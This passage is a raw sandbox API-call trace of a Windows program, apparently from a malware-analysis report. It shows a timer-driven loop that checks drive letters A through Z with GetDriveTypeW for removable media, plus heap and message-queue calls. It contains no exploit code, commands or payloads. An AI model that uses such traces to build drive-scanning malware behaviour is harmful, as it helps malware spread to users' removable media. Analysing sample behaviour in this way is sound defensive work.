[0217.198] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0217.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0217.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0217.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.199] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.199] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.199] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.199] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.200] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.200] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.200] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.200] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.200] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.200] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.201] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.201] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.201] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.201] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.202] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.202] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.202] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.202] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.202] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.203] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.203] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.203] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.203] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.204] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.204] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.204] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.204] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.204] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.205] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.205] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0217.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0217.205] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.206] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0217.206] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0217.206] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.206] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.206] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.206] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.207] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.207] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0217.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0217.207] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.207] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.207] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.207] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.207] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.208] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.208] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.208] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.208] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.208] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.209] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.209] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.209] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.210] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.210] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.210] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.210] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.210] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.211] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.211] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.211] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.211] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.212] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.212] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.212] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.212] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.213] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.213] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.213] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.213] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.215] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0217.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.216] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.216] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.216] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.216] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.216] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.216] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.216] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.217] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0217.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.217] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0217.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f60 [0217.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.218] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f60 | out: hHeap=0x12c0000) returned 1 [0217.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0217.218] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0217.218] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0217.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0217.219] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0217.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0217.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.219] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.219] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0217.219] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0217.219] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0217.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.220] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0217.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0217.220] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0217.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0217.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.220] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0217.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0217.220] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.220] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.220] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.221] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.221] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.221] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.221] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.222] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.222] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.222] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.222] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.222] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.223] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.223] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.223] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.223] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.224] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.224] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.224] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.224] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.224] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.225] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.225] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.225] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.226] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.226] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.226] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.226] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.227] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0217.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.228] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0217.228] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0217.228] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.228] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, 